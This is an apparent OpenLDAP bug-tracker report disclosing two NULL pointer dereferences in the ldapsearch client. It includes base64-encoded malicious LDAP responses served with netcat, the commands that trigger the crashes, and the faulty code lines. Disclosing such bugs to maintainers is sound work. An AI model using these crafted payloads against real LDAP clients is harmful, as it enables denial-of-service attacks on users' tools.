[Date Prev][Date Next] [Chronological] [Thread] [Top]

(ITS#8842) NULL pointer derefence

To: openldap-its@OpenLDAP.org
Subject: (ITS#8842) NULL pointer derefence
From: openldap@katzen.cc
Date: Tue, 01 May 2018 20:14:50 +0000
Auto-submitted: auto-generated (OpenLDAP-ITS)

Full_Name: Catz Meow
Version: openldap-2.4.46
OS: Archlinux
URL: ftp://ftp.openldap.org/incoming/
Submission from: (NULL) (134.19.121.246)


2 small issues:
I'm keeping it brief, let me know if you need more information.

A malicious LDAP server or mitm attacker can craft a response that causes the
ldap client to crash. Nothing critical, just a simoke DoS.

echo "MAwCAQFhBwoBAAQABAAwNgIBAnkxBBFkYz1leGFtcGxlLGRjPWNvbQoBAgoBAAIBAAIBAAEBAIcL
b2JqZWN0Y2xhc3MwADCBiQIBAmSBgwQRZGM9ZXhhbXBsZSxkYz1jb20wbjAnBAtvYmplY3RDbGFz
czEYBAhkY09iamVjdAQMb3JnYW5pemF0aW9uMA8EAmRjMQkEB2V4YW1wbGUwDgQBbzEJBAdFeGFt
cGxlMCIEC2Rlc2NyaXB0aW9uMRMEEUV4YW1wbGUgZGlyZWN0b3J5MHkCAQJkdAQZY249cm9vdCxk
Yz1leGFtcGxlLGRjPWNvbTBXMCMEC29iamVjdENsYXNzMRQEEm9yZ2FuaXphdGlvbmFsUm9sZTAM
BAJjbjEGBARyb290MCIEC2Rlc2NyaXB0aW9uMRMEEURpcmVjdG9yeSBNYW5hZ2VyMIIBcAIBAmSC
AWkEGnVpZD1hZGFtLGRjPWV4YW1wbGUsZGM9Y29tMIIBSTA6BAtvYmplY3RDbGFzczErBAN0b3AE
B2FjY291bnQEDHBvc2l4QWNjb3VudAQNc2hhZG93QWNjb3VudDAMBAJjbjEGBARhZGFtMA0EA3Vp
ZDEGBARhZGFtMBQECXVpZE51bWJlcjEHBAUxNjg1OTASBAlnaWROdW1iZXIxBQQDMTAwMB0EDWhv
bWVEaXJlY3RvcnkxDAQKL2hvbWUvYWRhbTAZBApsb2dpblNoZWxsMQsECS9iaW4vYmFzaDAPBAVn
ZWNvczEGBARhZGFtMBcEEHNoYWRvd0xhc3RDaGFuZ2UxAwQBMDAQBAlzaGFkb3dNYXgxAwQBMDAU
BA1zaGFkb3dXYXJuaW5nMQMEATAwOAQMdXNlclBhc3N3b3JkMSgEJntTU0hBfXMzdWIwNnpCNVd2
UmVUZFZPOEVRelRMWVhvSFRCWGVNMAwCAQJlBwoBAAQABAA=" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


Affected code:
./clients/tools/ldapsearch.c

static int dosearch(
[...]
 case LDAP_RES_INTERMEDIATE:
                                npartial++;
                                ldap_parse_intermediate( ld, msg,
                                        &retoid, &retdata, NULL, 0 );
                                nresponses_psearch = 0;
			if ( strcmp( retoid, LDAP_SYNC_INFO ) == 0 ) {

The problem here is that retoid can be NULL after ldap_parse_intermediate() is
called. 





Another NULL pointer dereference caused by a bad response:

echo "MAwCAQFhBwoBAAQABAAwgYkCAQJkgYMEEWRjPWV4YW1wbGUsZGM9AARtMG4wJwQLb2JqZWN0Q2xh
c3MxGAQIZGNPYmplY3QEDG9yZ2FuaXphdGlvbjAPBAJkYzEJBAdleGFtcGxlMA4EAW8xCQQHRXhh
bXBsZTAiBAtkZXNjcmlwdGlvbjETBBFFeGFtcGxlIGRpcmVjdG9yeTB5AgECZHQEGWNuPXJvb3Qs
ZGM9ZXhhbXBsZSxkYz1jb20wVzAjBAtvYmplY3RDbGFzczEUBBJvcmdhbml6YXRpb25hbFJvbGUw
DAQCY24xBgQEcm9vdDAiBAtkZXNjcmlwdGlvbjETBBFEaXJlY3RvcnkgTWFuYWdlcjCCAXACAQJk
ggFpBBp1aWQ9YWRhbSxkYz1leGFtcGxlLGRjPWNvbTCCAUkwOgQLb2JqZWN0Q2xhc3MxKwQDdG9w
BAdhY2NvdW50BAxwb3NpeEFjY291bnQEDXNoYWRvd0FjY291bnQwDAQCY24xBgQEYWRhbTANBAN1
aWQxBgQEYWRhbTAUBAl1aWROdW1iZXIxBwQFMTY4NTkwEgQJZ2lkTnVtYmVyMQUEAzEwMDAdBA1o
b21lRGlyZWN0b3J5MQwECi9ob21lL2FkYW0wGQQKbG9naW5TaGVsbDELBAkvYmluL2Jhc2gwDwQF
Z2Vjb3MxBgQEYWRhbTAXBBBzaGFkb3dMYXN0Q2hhbmdlMQMEATAwEAQJc2hhZG93TWF4MQMEATAw
FAQNc2hhZG93V2FybmluZzEDBAEwMDgEDHVzZXJQYXNzd29yZDEoBCZ7U1NIQX1zM3ViMDZ6QjVX
dlJlVGRWTzhFUXpUTFlYb0hUQlhlTTAMAgECZQcKAQAEAAQA" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


The PoC leads to memcpy being called with a NULL pointer as second argument
(ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):

AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);

Prev by Date: Re: (ITS#8616) olcSpNopresent and olcSpReloadHint can't be modified dynamically
Next by Date: (ITS#8843) null modlist with MMR > 2 can cause segv
Index(es):
- Chronological
- Thread